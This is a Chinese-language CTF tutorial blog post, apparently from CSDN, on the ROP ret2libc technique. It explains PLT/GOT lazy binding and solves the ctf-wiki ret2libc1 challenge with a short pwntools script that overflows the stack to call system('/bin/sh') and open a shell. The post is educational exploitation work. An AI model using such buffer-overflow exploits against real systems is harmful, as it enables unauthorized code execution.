浅谈ROP-ret2libc原理-题目源于[ctfwiki]

3 篇文章 0 订阅

rop:在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。–[ctfwiki]
传送门
之前提到的ret2syscall,提到了静态链接,而libc主要利用了动态链接。

0x01

知识点:
简单来说,静态链接就是直接在原有的基础之上进行访问,而动态链接就是直接放上一个链接来访问。
1.plt表和got表
在这里插入图片描述
拿一个c语言编写的printf函数为例,当调用printf函数时,先去plt表和got表寻找printf函数的真实地址。plt表指向got表中的地址,got表指向glibc中的地址。

当第一次调用函数时,过程为:plt->got->plt->公共plt->动态连接器_dl_runtime_resolve->找到函数地址。其中,_dl_runtime_resolve函数作用为查找函数地址并返回给got表。

当第二次调用时,过程为:plt->got->直接获取函数地址,因为此时got表已经记录函数地址。

0x02

0x01,ret2libc1
题目解析:首先checksec一下:
在这里插入图片描述
放到ida中:发现有system函数的plt表,以及binsh关键字:
在这里插入图片描述

在这里插入图片描述
此时,求偏移量:
在这里插入图片描述
我们就可以利用以上地址编写exp:

from pwn import *

sh = process('./ret2libc1')
#sh=remote(" ",)
binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
#flat函数,相当于p32()/p64()函数,‘b’*4表示返回地址,可以随便填写
sh.sendline(payload)

sh.interactive()

在这里插入图片描述
未完待续。。。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值